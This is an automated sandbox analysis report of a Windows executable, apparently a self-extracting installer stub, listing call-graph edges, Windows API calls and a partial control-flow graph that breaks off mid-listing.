2617->2619 2620 7ff7bde74dcc 24 API calls 2618->2620 2621 7ff7bde73fef 2619->2621 2622 7ff7bde73fcb 2620->2622 2623 7ff7bde73ff3 2621->2623 2624 7ff7bde74030 lstrcmpA 2621->2624 2892 7ff7bde77700 GetLastError 2622->2892 2626 7ff7bde74dcc 24 API calls 2623->2626 2627 7ff7bde7404e 2624->2627 2628 7ff7bde74098 LocalFree 2624->2628 2629 7ff7bde74011 LocalFree 2626->2629 2630 7ff7bde77ac8 28 API calls 2627->2630 2631 7ff7bde73139 2628->2631 2629->2631 2632 7ff7bde7406e LocalFree 2630->2632 2631->2160 2631->2169 2632->2631 2633->2196 2641 7ff7bde7778a 2634->2641 2635 7ff7bde7114c _vsnprintf 2636 7ff7bde777df FindResourceA 2635->2636 2637 7ff7bde7775e LoadResource LockResource 2636->2637 2638 7ff7bde77801 2636->2638 2637->2638 2637->2641 2639 7ff7bde78470 7 API calls 2638->2639 2640 7ff7bde7782e 2639->2640 2640->2184 2641->2635 2642 7ff7bde777b8 FreeResource 2641->2642 2643 7ff7bde77803 FreeResource 2641->2643 2642->2641 2643->2638 2645 7ff7bde75050 7 API calls 2644->2645 2646 7ff7bde74967 LocalAlloc 2645->2646 2647 7ff7bde749a9 2646->2647 2648 7ff7bde74989 2646->2648 2650 7ff7bde75050 7 API calls 2647->2650 2649 7ff7bde74dcc 24 API calls 2648->2649 2652 7ff7bde749a7 2649->2652 2651 7ff7bde749bb 2650->2651 2653 7ff7bde749d5 lstrcmpA 2651->2653 2654 7ff7bde749bf 2651->2654 2652->2169 2653->2654 2655 7ff7bde74a0e LocalFree 2653->2655 2656 7ff7bde74dcc 24 API calls 2654->2656 2655->2652 2656->2655 2657->2455 2659 7ff7bde76516 2658->2659 2661 7ff7bde765dd 2658->2661 2689 7ff7bde763b8 2659->2689 2700 7ff7bde76b70 2661->2700 2662 7ff7bde76688 2664 7ff7bde78470 7 API calls 2662->2664 2667 7ff7bde766a8 2664->2667 2667->2488 2683 7ff7bde72468 GetWindowsDirectoryA 2667->2683 2668 7ff7bde76649 2668->2662 2676 7ff7bde76ca4 38 API calls 2668->2676 2669 7ff7bde7662a CreateDirectoryA 2672 7ff7bde7667d 2669->2672 2673 7ff7bde7663f 2669->2673 2670 7ff7bde765cc 2674 7ff7bde77ba8 CharPrevA 2670->2674 2671 7ff7bde76577 GetSystemInfo 2675 7ff7bde76591 2671->2675 2712 7ff7bde77700 GetLastError 2672->2712 2673->2668 2674->2661 2675->2670 2678 7ff7bde77ba8 CharPrevA 2675->2678 2679 7ff7bde7665a 2676->2679 2678->2670 2679->2662 2681 7ff7bde76666 RemoveDirectoryA 2679->2681 2680 7ff7bde76682 2680->2662 2681->2662 2682->2485 2684 7ff7bde724a6 2683->2684 2685 7ff7bde724c4 2683->2685 2686 7ff7bde74dcc 24 API calls 2684->2686 2687 7ff7bde78470 7 API calls 2685->2687 2686->2685 2688 7ff7bde724df 2687->2688 2688->2500 2688->2507 2691 7ff7bde763e3 2689->2691 2692 7ff7bde77ba8 CharPrevA 2691->2692 2695 7ff7bde7644b GetTempFileNameA 2691->2695 2713 7ff7bde7114c 2691->2713 2693 7ff7bde76420 RemoveDirectoryA GetFileAttributesA 2692->2693 2693->2691 2694 7ff7bde764b6 CreateDirectoryA 2693->2694 2694->2695 2696 7ff7bde76490 2694->2696 2695->2696 2697 7ff7bde7646b DeleteFileA CreateDirectoryA 2695->2697 2698 7ff7bde78470 7 API calls 2696->2698 2697->2696 2699 7ff7bde764a2 2698->2699 2699->2662 2699->2670 2699->2671 2701 7ff7bde76b8b 2700->2701 2701->2701 2702 7ff7bde76b94 LocalAlloc 2701->2702 2703 7ff7bde76bf5 2702->2703 2704 7ff7bde76bb4 2702->2704 2708 7ff7bde77ba8 CharPrevA 2703->2708 2705 7ff7bde74dcc 24 API calls 2704->2705 2706 7ff7bde76bd2 2705->2706 2709 7ff7bde76626 2706->2709 2716 7ff7bde77700 GetLastError 2706->2716 2710 7ff7bde76c14 CreateFileA LocalFree 2708->2710 2709->2668 2709->2669 2710->2706 2711 7ff7bde76c61 CloseHandle GetFileAttributesA 2710->2711 2711->2706 2712->2680 2714 7ff7bde71178 _vsnprintf 2713->2714 2715 7ff7bde71199 2713->2715 2714->2715 2715->2691 2716->2709 2717->2532 2718->2537 2720 7ff7bde72525 2719->2720 2721 7ff7bde72562 2719->2721 2722 7ff7bde7114c _vsnprintf 2720->2722 2723 7ff7bde725ab 2721->2723 2724 7ff7bde72567 2721->2724 2725 7ff7bde7253d 2722->2725 2730 7ff7bde7114c _vsnprintf 2723->2730 2734 7ff7bde7255d 2723->2734 2726 7ff7bde7114c _vsnprintf 2724->2726 2727 7ff7bde74dcc 24 API calls 2725->2727 2729 7ff7bde7257f 2726->2729 2727->2734 2728 7ff7bde78470 7 API calls 2731 7ff7bde72609 2728->2731 2732 7ff7bde74dcc 24 API calls 2729->2732 2733 7ff7bde725c7 2730->2733 2731->2535 2732->2734 2735 7ff7bde74dcc 24 API calls 2733->2735 2734->2728 2735->2734 2736->2529 2738 7ff7bde75ced 2737->2738 2748 7ff7bde75d62 2737->2748 2749 7ff7bde75380 2738->2749 2741 7ff7bde78470 7 API calls 2743 7ff7bde75d78 2741->2743 2742 7ff7bde75d0d #21 2744 7ff7bde75d28 2742->2744 2742->2748 2743->2554 2743->2555 2744->2748 2761 7ff7bde75770 2744->2761 2747 7ff7bde75d4f #23 2747->2748 2748->2741 2750 7ff7bde753b3 2749->2750 2751 7ff7bde753fd lstrcmpA 2750->2751 2752 7ff7bde753d0 2750->2752 2754 7ff7bde753f4 2751->2754 2755 7ff7bde75454 2751->2755 2753 7ff7bde74dcc 24 API calls 2752->2753 2753->2754 2754->2742 2754->2748 2755->2754 2756 7ff7bde754a8 CreateFileA 2755->2756 2756->2754 2758 7ff7bde754de 2756->2758 2757 7ff7bde75561 CreateFileA 2757->2754 2758->2754 2758->2757 2759 7ff7bde75549 CharNextA 2758->2759 2760 7ff7bde75532 CreateDirectoryA 2758->2760 2759->2758 2760->2759 2762 7ff7bde757a4 CloseHandle 2761->2762 2763 7ff7bde7578f 2761->2763 2762->2763 2763->2747 2763->2748 2765 7ff7bde716d3 2764->2765 2856 7ff7bde715e8 2765->2856 2768 7ff7bde77ba8 CharPrevA 2770 7ff7bde71766 2768->2770 2769 7ff7bde77d68 2 API calls 2771 7ff7bde71811 2769->2771 2770->2769 2772 7ff7bde71a1b 2771->2772 2773 7ff7bde7181a CompareStringA 2771->2773 2775 7ff7bde77d68 2 API calls 2772->2775 2773->2772 2774 7ff7bde7184d GetFileAttributesA 2773->2774 2776 7ff7bde71867 2774->2776 2777 7ff7bde719f3 2774->2777 2778 7ff7bde71a28 2775->2778 2776->2777 2781 7ff7bde715e8 2 API calls 2776->2781 2783 7ff7bde74dcc 24 API calls 2777->2783 2779 7ff7bde71acb LocalAlloc 2778->2779 2780 7ff7bde71a31 CompareStringA 2778->2780 2779->2777 2782 7ff7bde71aeb GetFileAttributesA 2779->2782 2780->2779 2788 7ff7bde71a60 2780->2788 2784 7ff7bde7188b 2781->2784 2791 7ff7bde71b01 2782->2791 2801 7ff7bde7194f 2783->2801 2785 7ff7bde718b5 LocalAlloc 2784->2785 2789 7ff7bde715e8 2 API calls 2784->2789 2785->2777 2790 7ff7bde718d7 GetPrivateProfileIntA GetPrivateProfileStringA 2785->2790 2786 7ff7bde71bd1 2787 7ff7bde78470 7 API calls 2786->2787 2792 7ff7bde71be9 2787->2792 2788->2788 2793 7ff7bde71a81 LocalAlloc 2788->2793 2789->2785 2794 7ff7bde71984 2790->2794 2790->2801 2802 7ff7bde71b54 2791->2802 2792->2586 2793->2777 2797 7ff7bde71ab2 2793->2797 2795 7ff7bde719ba 2794->2795 2796 7ff7bde71995 GetShortPathNameA 2794->2796 2800 7ff7bde7114c _vsnprintf 2795->2800 2796->2795 2799 7ff7bde7114c _vsnprintf 2797->2799 2799->2801 2800->2801 2801->2786 2864 7ff7bde72a6c 2802->2864 2804 7ff7bde71dce 2803->2804 2805 7ff7bde72019 2803->2805 2808 7ff7bde7114c _vsnprintf 2804->2808 2810 7ff7bde71e25 2804->2810 2806 7ff7bde78470 7 API calls 2805->2806 2807 7ff7bde72028 2806->2807 2807->2586 2809 7ff7bde71dee RegQueryValueExA 2808->2809 2809->2804 2809->2810 2811 7ff7bde71e29 RegCloseKey 2810->2811 2812 7ff7bde71e46 GetSystemDirectoryA 2810->2812 2811->2805 2813 7ff7bde77ba8 CharPrevA 2812->2813 2814 7ff7bde71e6a LoadLibraryA 2813->2814 2815 7ff7bde71f55 GetModuleFileNameA 2814->2815 2816 7ff7bde71e86 GetProcAddress FreeLibrary 2814->2816 2817 7ff7bde71f78 RegCloseKey 2815->2817 2821 7ff7bde71ee8 LocalAlloc 2815->2821 2816->2815 2818 7ff7bde71ebe GetSystemDirectoryA 2816->2818 2817->2805 2819 7ff7bde71ed5 2818->2819 2818->2821 2820 7ff7bde77ba8 CharPrevA 2819->2820 2820->2821 2823 7ff7bde71f8e 2821->2823 2824 7ff7bde71f35 2821->2824 2826 7ff7bde7114c _vsnprintf 2823->2826 2825 7ff7bde74dcc 24 API calls 2824->2825 2827 7ff7bde71f53 2825->2827 2828 7ff7bde71fc4 2826->2828 2827->2817 2828->2828 2829 7ff7bde71fcd RegSetValueExA RegCloseKey LocalFree 2828->2829 2829->2805 2831 7ff7bde748b3 2830->2831 2832 7ff7bde747c2 WaitForSingleObject GetExitCodeProcess 2830->2832 2891 7ff7bde77700 GetLastError 2831->2891 2833 7ff7bde747f9 2832->2833 2839 7ff7bde72318 18 API calls 2833->2839 2844 7ff7bde7482a CloseHandle CloseHandle 2833->2844 2835 7ff7bde748b8 GetLastError FormatMessageA 2836 7ff7bde74dcc 24 API calls 2835->2836 2838 7ff7bde7491c 2836->2838 2841 7ff7bde78470 7 API calls 2838->2841 2842 7ff7bde7484d 2839->2842 2840 7ff7bde748aa 2840->2838 2843 7ff7bde7492f 2841->2843 2842->2844 2843->2586 2844->2838 2844->2840 2846 7ff7bde77a25 2845->2846 2847 7ff7bde77ba8 CharPrevA 2846->2847 2848 7ff7bde77a63 GetFileAttributesA 2847->2848 2849 7ff7bde77a79 2848->2849 2850 7ff7bde77a96 LoadLibraryA 2848->2850 2849->2850 2851 7ff7bde77a7d LoadLibraryExA 2849->2851 2852 7ff7bde77aa9 2850->2852 2851->2852 2853 7ff7bde78470 7 API calls 2852->2853 2854 7ff7bde77ab9 2853->2854 2854->2611 2855->2574 2857 7ff7bde71609 2856->2857 2859 7ff7bde71621 2857->2859 2861 7ff7bde71651 2857->2861 2877 7ff7bde77ce8 2857->2877 2860 7ff7bde77ce8 2 API calls 2859->2860 2862 7ff7bde7162f 2860->2862 2861->2768 2861->2770 2862->2861 2863 7ff7bde77ce8 2 API calls 2862->2863 2863->2862 2865 7ff7bde72c24 2864->2865 2866 7ff7bde72aa0 GetModuleFileNameA 2864->2866 2868 7ff7bde78470 7 API calls 2865->2868 2866->2865 2867 7ff7bde72ac8 2866->2867 2869 7ff7bde72acc IsDBCSLeadByte 2867->2869 2871 7ff7bde72bf6 CharNextA 2867->2871 2872 7ff7bde72af1 CharNextA CharUpperA 2867->2872 2873 7ff7bde72c08 CharNextA 2867->2873 2876 7ff7bde72b36 CharPrevA 2867->2876 2882 7ff7bde77c40 2867->2882 2870 7ff7bde72c37 2868->2870 2869->2867 2870->2786 2871->2873 2872->2867 2874 7ff7bde72b9b CharUpperA 2872->2874 2873->2865 2873->2869 2874->2867 2876->2867 2879 7ff7bde77d00 2877->2879 2878 7ff7bde77d47 2878->2857 2879->2878 2880 7ff7bde77d0a IsDBCSLeadByte 2879->2880 2881 7ff7bde77d30 CharNextA 2879->2881 2880->2878 2880->2879 2881->2879 2883 7ff7bde77c58 2882->2883 2883->2883 2884 7ff7bde77c61 CharPrevA 2883->2884 2885 7ff7bde77c7d CharPrevA 2884->2885 2886 7ff7bde77c75 2885->2886 2887 7ff7bde77c94 2885->2887 2886->2885 2886->2887 2888 7ff7bde77c9e CharPrevA 2887->2888 2889 7ff7bde77cb5 CharNextA 2887->2889 2890 7ff7bde77cc7 2887->2890 2888->2889 2888->2890 2889->2890 2890->2867 2891->2835 2892->2631 2894 7ff7bde722eb 2893->2894 2895 7ff7bde72281 2893->2895 2897 7ff7bde78470 7 API calls 2894->2897 2896 7ff7bde77ba8 CharPrevA 2895->2896 2898 7ff7bde72294 WritePrivateProfileStringA _lopen 2896->2898 2899 7ff7bde722fd 2897->2899 2898->2894 2900 7ff7bde722c7 _llseek _lclose 2898->2900 2899->2225 2900->2894 3080 7ff7bde71500 3081 7ff7bde71557 GetDesktopWindow 3080->3081 3083 7ff7bde71530 3080->3083 3082 7ff7bde74c68 14 API calls 3081->3082 3086 7ff7bde7156e LoadStringA SetDlgItemTextA MessageBeep 3082->3086 3084 7ff7bde71553 3083->3084 3085 7ff7bde71542 EndDialog 3083->3085 3087 7ff7bde78470 7 API calls 3084->3087 3085->3084 3086->3084 3088 7ff7bde715d0 3087->3088 3089 7ff7bde73840 3090 7ff7bde73852 3089->3090 3093 7ff7bde7385a 3089->3093 3092 7ff7bde7388e GetDesktopWindow 3090->3092 3090->3093 3091 7ff7bde738ec EndDialog 3095 7ff7bde7385f 3091->3095 3094 7ff7bde74c68 14 API calls 3092->3094 3093->3091 3093->3095 3096 7ff7bde738a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3094->3096 3096->3095 2961 7ff7bde781b0 __getmainargs 2962 7ff7bde78b30 _XcptFilter 2915 7ff7bde758b0 2916 7ff7bde758ee 2915->2916 2917 7ff7bde75904 2915->2917 2918 7ff7bde75770 CloseHandle 2916->2918 2923 7ff7bde758fc 2916->2923 2920 7ff7bde75a29 2917->2920 2917->2923 2924 7ff7bde7591a 2917->2924 2918->2923 2919 7ff7bde78470 7 API calls 2922 7ff7bde75af4 2919->2922 2921 7ff7bde75a35 SetDlgItemTextA 2920->2921 2925 7ff7bde75a4a 2920->2925 2921->2925 2923->2919 2924->2923 2926 7ff7bde75982 DosDateTimeToFileTime 2924->2926 2925->2923 2940 7ff7bde751bc GetFileAttributesA 2925->2940 2926->2923 2928 7ff7bde759a3 LocalFileTimeToFileTime 2926->2928 2928->2923 2930 7ff7bde759c1 SetFileTime 2928->2930 2930->2923 2931 7ff7bde759e9 2930->2931 2933 7ff7bde75770 CloseHandle 2931->2933 2932 7ff7bde75380 29 API calls 2934 7ff7bde75ab5 2932->2934 2935 7ff7bde759f2 SetFileAttributesA 2933->2935 2934->2923 2936 7ff7bde75ac1 2934->2936 2935->2923 2947 7ff7bde7527c LocalAlloc 2936->2947 2938 7ff7bde75acb 2938->2923 2941 7ff7bde7525f 2940->2941 2943 7ff7bde751de 2940->2943 2941->2923 2941->2932 2942 7ff7bde75246 SetFileAttributesA 2942->2941 2943->2941 2943->2942 2944 7ff7bde77ac8 28 API calls 2943->2944 2945 7ff7bde75228 2944->2945 2945->2941 2945->2942 2946 7ff7bde7523c 2945->2946 2946->2942 2948 7ff7bde752aa 2947->2948 2949 7ff7bde752d4 LocalAlloc 2947->2949 2950 7ff7bde74dcc 24 API calls 2948->2950 2951 7ff7bde752cd 2949->2951 2953 7ff7bde75300 2949->2953 2950->2951 2951->2938 2954 7ff7bde74dcc 24 API calls 2953->2954 2955 7ff7bde75323 LocalFree 2954->2955 2955->2951 2999 7ff7bde733f0 3000 7ff7bde734ec 2999->3000 3001 7ff7bde73402 2999->3001 3003 7ff7bde734f5 SendDlgItemMessageA 3000->3003 3004 7ff7bde734e5 3000->3004 3002 7ff7bde7340f 3001->3002 3005 7ff7bde73441 GetDesktopWindow 3001->3005 3002->3004 3006 7ff7bde73430 EndDialog 3002->3006 3003->3004 3007 7ff7bde74c68 14 API calls 3005->3007 3006->3004 3008 7ff7bde73458 6 API calls 3007->3008 3008->3004 3009 7ff7bde75870 GlobalAlloc 3010 7ff7bde778b0 3011 7ff7bde778fd 3010->3011 3012 7ff7bde77ba8 CharPrevA 3011->3012 3013 7ff7bde77935 CreateFileA 3012->3013 3014 7ff7bde7797e WriteFile 3013->3014 3015 7ff7bde77970 3013->3015 3016 7ff7bde779a2 CloseHandle 3014->3016 3018 7ff7bde78470 7 API calls 3015->3018 3016->3015 3019 7ff7bde779d5 3018->3019 3020 7ff7bde74a30 3021 7ff7bde74a39 SendMessageA 3020->3021 3022 7ff7bde74a50 3020->3022 3021->3022 3023 7ff7bde73530 3024 7ff7bde73557 3023->3024 3025 7ff7bde73802 EndDialog 3023->3025 3026 7ff7bde7377e GetDesktopWindow 3024->3026 3027 7ff7bde73567 3024->3027 3034 7ff7bde7356b 3025->3034 3028 7ff7bde74c68 14 API calls 3026->3028 3029 7ff7bde7357b 3027->3029 3030 7ff7bde73635 GetDlgItemTextA 3027->3030 3027->3034 3031 7ff7bde73795 SetWindowTextA SendDlgItemMessageA 3028->3031 3032 7ff7bde73618 EndDialog 3029->3032 3033 7ff7bde73584 3029->3033 3039 7ff7bde7365e 3030->3039 3055 7ff7bde736e9 3030->3055 3031->3034 3035 7ff7bde737d8 GetDlgItem EnableWindow 3031->3035 3032->3034 3033->3034 3036 7ff7bde73591 LoadStringA 3033->3036 3035->3034 3037 7ff7bde735bd 3036->3037 3038 7ff7bde735de 3036->3038 3043 7ff7bde74dcc 24 API calls 3037->3043 3060 7ff7bde74a60 LoadLibraryA 3038->3060 3042 7ff7bde73694 GetFileAttributesA 3039->3042 3039->3055 3041 7ff7bde74dcc 24 API calls 3041->3034 3045 7ff7bde736fa 3042->3045 3046 7ff7bde736a8 3042->3046 3059 7ff7bde735d7 3043->3059 3050 7ff7bde77ba8 CharPrevA 3045->3050 3048 7ff7bde74dcc 24 API calls 3046->3048 3047 7ff7bde735eb SetDlgItemTextA 3047->3034 3047->3037 3051 7ff7bde736cb 3048->3051 3049 7ff7bde7374b EndDialog 3049->3034 3052 7ff7bde7370e 3050->3052 3051->3034 3053 7ff7bde736d4 CreateDirectoryA 3051->3053 3054 7ff7bde76b70 31 API calls 3052->3054 3053->3045 3053->3055 3056 7ff7bde73716 3054->3056 3055->3041 3056->3055 3057 7ff7bde73721 3056->3057 3058 7ff7bde76ca4 38 API calls 3057->3058 3057->3059 3058->3059 3059->3034 3059->3049 3061 7ff7bde74c20 3060->3061 3062 7ff7bde74aa0 GetProcAddress 3060->3062 3066 7ff7bde74dcc 24 API calls 3061->3066 3063 7ff7bde74c0a FreeLibrary 3062->3063 3064 7ff7bde74ac2 GetProcAddress 3062->3064 3063->3061 3064->3063 3065 7ff7bde74ae2 GetProcAddress 3064->3065 3065->3063 3067 7ff7bde74b04 3065->3067 3068 7ff7bde735e3 3066->3068 3069 7ff7bde74b13 GetTempPathA 3067->3069 3074 7ff7bde74b65 3067->3074 3068->3034 3068->3047 3070 7ff7bde74b2b 3069->3070 3070->3070 3071 7ff7bde74b34 CharPrevA 3070->3071 3073 7ff7bde74b4e CharPrevA 3071->3073 3071->3074 3072 7ff7bde74bee FreeLibrary 3072->3068 3073->3074 3074->3072 3075 7ff7bde78417 3076 7ff7bde78426 _exit 3075->3076 3077 7ff7bde7842f 3075->3077 3076->3077 3078 7ff7bde78438 _cexit 3077->3078 3079 7ff7bde78444 3077->3079 3078->3079 3097 7ff7bde755e0 3098 7ff7bde75641 ReadFile 3097->3098 3099 7ff7bde7560d 3097->3099 3098->3099 3100 7ff7bde757e0 3101 7ff7bde7581e 3100->3101 3103 7ff7bde757fc 3100->3103 3102 7ff7bde7583d SetFilePointer 3101->3102 3101->3103 3102->3103 3104 7ff7bde733a0 3105 7ff7bde733bb CallWindowProcA 3104->3105 3106 7ff7bde733ac 3104->3106 3107 7ff7bde733b7 3105->3107 3106->3105 3106->3107

                                                                                                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                                                                                                              callgraph 0 Function_00007FF7BDE71C0C 31 Function_00007FF7BDE78470 0->31 48 Function_00007FF7BDE74DCC 0->48 1 Function_00007FF7BDE71008 2 Function_00007FF7BDE78494 3 Function_00007FF7BDE78910 4 Function_00007FF7BDE78790 5 Function_00007FF7BDE73910 28 Function_00007FF7BDE74C68 5->28 5->48 69 Function_00007FF7BDE73B40 5->69 6 Function_00007FF7BDE75D90 46 Function_00007FF7BDE75C60 6->46 6->48 59 Function_00007FF7BDE75050 6->59 7 Function_00007FF7BDE75690 7->69 8 Function_00007FF7BDE7527C 8->1 8->48 9 Function_00007FF7BDE724F8 9->31 9->48 50 Function_00007FF7BDE7114C 9->50 10 Function_00007FF7BDE71684 10->1 12 Function_00007FF7BDE71084 10->12 23 Function_00007FF7BDE72A6C 10->23 25 Function_00007FF7BDE715E8 10->25 26 Function_00007FF7BDE77D68 10->26 10->31 10->48 10->50 73 Function_00007FF7BDE77BA8 10->73 11 Function_00007FF7BDE77F04 11->31 13 Function_00007FF7BDE78802 14 Function_00007FF7BDE78200 38 Function_00007FF7BDE78964 14->38 54 Function_00007FF7BDE72C54 14->54 55 Function_00007FF7BDE788D0 14->55 15 Function_00007FF7BDE78880 16 Function_00007FF7BDE75380 16->48 17 Function_00007FF7BDE77700 18 Function_00007FF7BDE71500 18->28 18->31 19 Function_00007FF7BDE77E00 20 Function_00007FF7BDE730EC 20->6 20->17 30 Function_00007FF7BDE73F74 20->30 20->31 40 Function_00007FF7BDE75FE4 20->40 20->48 51 Function_00007FF7BDE7494C 20->51 53 Function_00007FF7BDE77AC8 20->53 64 Function_00007FF7BDE740C4 20->64 65 Function_00007FF7BDE766C4 20->65 70 Function_00007FF7BDE7772C 20->70 20->73 88 Function_00007FF7BDE72318 20->88 91 Function_00007FF7BDE76CA4 20->91 92 Function_00007FF7BDE760A4 20->92 21 Function_00007FF7BDE761EC 21->31 47 Function_00007FF7BDE7204C 21->47 67 Function_00007FF7BDE77C40 21->67 22 Function_00007FF7BDE712EC 22->31 49 Function_00007FF7BDE711CC 22->49 23->1 23->31 23->67 24 Function_00007FF7BDE77CE8 25->24 27 Function_00007FF7BDE72468 27->31 27->48 28->31 29 Function_00007FF7BDE73BF4 29->11 29->31 29->48 76 Function_00007FF7BDE77E34 29->76 77 Function_00007FF7BDE72834 29->77 30->17 30->48 30->53 30->59 31->2 32 Function_00007FF7BDE78870 33 Function_00007FF7BDE75770 34 Function_00007FF7BDE76B70 34->1 34->17 34->48 34->73 35 Function_00007FF7BDE733F0 35->28 36 Function_00007FF7BDE779F0 36->31 36->73 37 Function_00007FF7BDE75870 39 Function_00007FF7BDE764E4 39->17 39->31 39->34 63 Function_00007FF7BDE763B8 39->63 39->73 39->91 40->48 40->59 40->70 41 Function_00007FF7BDE78A62 85 Function_00007FF7BDE78A9C 41->85 42 Function_00007FF7BDE78B60 43 Function_00007FF7BDE755E0 44 Function_00007FF7BDE757E0 45 Function_00007FF7BDE74A60 45->1 45->48 46->16 46->31 46->33 47->12 47->31 47->47 47->73 48->1 48->11 48->31 48->50 48->76 49->31 51->48 51->59 52 Function_00007FF7BDE78648 52->2 53->48 54->0 54->20 54->21 54->48 75 Function_00007FF7BDE72DB4 54->75 54->88 55->15 79 Function_00007FF7BDE78930 55->79 56 Function_00007FF7BDE78750 57 Function_00007FF7BDE780D0 57->32 87 Function_00007FF7BDE78818 57->87 58 Function_00007FF7BDE77850 60 Function_00007FF7BDE787BC 61 Function_00007FF7BDE751BC 61->53 62 Function_00007FF7BDE7473C 62->17 62->31 62->48 62->88 63->1 63->31 63->50 63->73 64->10 64->17 64->31 64->36 64->48 64->50 64->59 64->62 72 Function_00007FF7BDE71D28 64->72 64->73 65->17 65->27 65->31 65->39 65->48 65->53 65->59 65->73 65->91 66 Function_00007FF7BDE72244 66->31 66->73 68 Function_00007FF7BDE73840 68->28 70->31 70->50 71 Function_00007FF7BDE7512C 71->1 71->12 72->31 72->48 72->50 72->73 73->12 74 Function_00007FF7BDE770A8 74->24 74->26 74->31 74->48 74->52 74->73 93 Function_00007FF7BDE77024 74->93 75->22 75->29 75->31 75->47 75->48 75->53 75->59 75->74 86 Function_00007FF7BDE7261C 77->86 78 Function_00007FF7BDE781B0 80 Function_00007FF7BDE78B30 81 Function_00007FF7BDE758B0 81->8 81->16 81->31 81->33 81->61 81->71 89 Function_00007FF7BDE75B18 81->89 82 Function_00007FF7BDE778B0 82->31 82->73 83 Function_00007FF7BDE74A30 84 Function_00007FF7BDE73530 84->28 84->34 84->45 84->48 84->73 84->91 86->1 86->31 86->73 87->60 88->66 90 Function_00007FF7BDE78417 91->9 91->17 91->31 91->48 92->17 92->48 92->59 94 Function_00007FF7BDE733A0

                                                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE740C4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 371libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 0 7ff7bde740c4-7ff7bde74116 1 7ff7bde74139-7ff7bde74141 0->1 2 7ff7bde74118-7ff7bde74133 call 7ff7bde75050 0->2 4 7ff7bde74145-7ff7bde74167 memset 1->4 2->1 9 7ff7bde74254-7ff7bde7427d call 7ff7bde74dcc 2->9 6 7ff7bde7416d-7ff7bde74188 call 7ff7bde75050 4->6 7 7ff7bde74282-7ff7bde74295 4->7 6->9 18 7ff7bde7418e-7ff7bde74194 6->18 8 7ff7bde74299-7ff7bde742a3 7->8 12 7ff7bde742b7-7ff7bde742c2 8->12 13 7ff7bde742a5-7ff7bde742ab 8->13 21 7ff7bde744ee 9->21 17 7ff7bde742c5-7ff7bde742c8 12->17 13->12 16 7ff7bde742ad-7ff7bde742b5 13->16 16->8 16->12 22 7ff7bde742ca-7ff7bde742e2 call 7ff7bde75050 17->22 23 7ff7bde74328-7ff7bde7433d call 7ff7bde71684 17->23 19 7ff7bde7419d-7ff7bde741a0 18->19 20 7ff7bde74196-7ff7bde7419b 18->20 25 7ff7bde741ad-7ff7bde741af 19->25 26 7ff7bde741a2-7ff7bde741ab 19->26 24 7ff7bde741b5 20->24 28 7ff7bde744f0-7ff7bde7451f call 7ff7bde78470 21->28 22->9 35 7ff7bde742e8-7ff7bde742ef 22->35 23->21 36 7ff7bde74343-7ff7bde7434a 23->36 30 7ff7bde741b8-7ff7bde741bb 24->30 25->30 31 7ff7bde741b1 25->31 26->24 30->17 37 7ff7bde741c1-7ff7bde741cb 30->37 31->24 39 7ff7bde745d8-7ff7bde745df 35->39 40 7ff7bde742f5-7ff7bde74322 CompareStringA 35->40 41 7ff7bde7434c-7ff7bde74353 36->41 42 7ff7bde7436a-7ff7bde7436c 36->42 43 7ff7bde741cd-7ff7bde741d0 37->43 44 7ff7bde74231-7ff7bde74234 37->44 49 7ff7bde7472d-7ff7bde7472f 39->49 50 7ff7bde745e5-7ff7bde745ec 39->50 40->23 40->39 41->42 46 7ff7bde74355-7ff7bde7435c 41->46 51 7ff7bde74493-7ff7bde7449b 42->51 52 7ff7bde74372-7ff7bde74379 42->52 47 7ff7bde741db-7ff7bde741dd 43->47 48 7ff7bde741d2-7ff7bde741d9 43->48 44->23 45 7ff7bde7423a-7ff7bde74252 call 7ff7bde75050 44->45 45->9 45->17 46->42 56 7ff7bde7435e-7ff7bde74360 46->56 47->21 58 7ff7bde741e3 47->58 57 7ff7bde741ea-7ff7bde741fb call 7ff7bde75050 48->57 49->28 50->49 59 7ff7bde745f2-7ff7bde74621 RegOpenKeyExA 50->59 54 7ff7bde7449d-7ff7bde744a4 call 7ff7bde7473c 51->54 55 7ff7bde744df-7ff7bde744e9 LocalFree 51->55 60 7ff7bde74599-7ff7bde745d3 call 7ff7bde74dcc LocalFree 52->60 61 7ff7bde7437f-7ff7bde74381 52->61 69 7ff7bde744a9-7ff7bde744ab 54->69 55->21 56->52 65 7ff7bde74362-7ff7bde74365 call 7ff7bde71d28 56->65 57->9 80 7ff7bde741fd-7ff7bde7422d CompareStringA 57->80 58->57 59->49 66 7ff7bde74627-7ff7bde74666 RegQueryValueExA 59->66 60->21 61->51 68 7ff7bde74387-7ff7bde7438e 61->68 65->42 72 7ff7bde7471c-7ff7bde74728 RegCloseKey 66->72 73 7ff7bde7466c-7ff7bde7469b memset GetSystemDirectoryA 66->73 68->51 75 7ff7bde74394-7ff7bde7439f call 7ff7bde779f0 68->75 69->55 77 7ff7bde744ad-7ff7bde744c3 LocalFree 69->77 72->49 78 7ff7bde7469d-7ff7bde746ae call 7ff7bde77ba8 73->78 79 7ff7bde746b3-7ff7bde746dc call 7ff7bde7114c 73->79 85 7ff7bde743a5-7ff7bde743c1 GetProcAddress 75->85 86 7ff7bde74574-7ff7bde74597 call 7ff7bde74dcc 75->86 77->39 83 7ff7bde744c9-7ff7bde744ce 77->83 78->79 90 7ff7bde746e3-7ff7bde746ea 79->90 80->44 83->4 88 7ff7bde743c7-7ff7bde74415 85->88 89 7ff7bde74521-7ff7bde7454e call 7ff7bde74dcc FreeLibrary 85->89 99 7ff7bde74553-7ff7bde7456f LocalFree call 7ff7bde77700 86->99 92 7ff7bde74417-7ff7bde7441b 88->92 93 7ff7bde7441f-7ff7bde74427 88->93 89->99 90->90 94 7ff7bde746ec-7ff7bde74717 RegSetValueExA 90->94 92->93 97 7ff7bde74429-7ff7bde7442d 93->97 98 7ff7bde74431-7ff7bde74433 93->98 94->72 97->98 102 7ff7bde7443d-7ff7bde74445 98->102 103 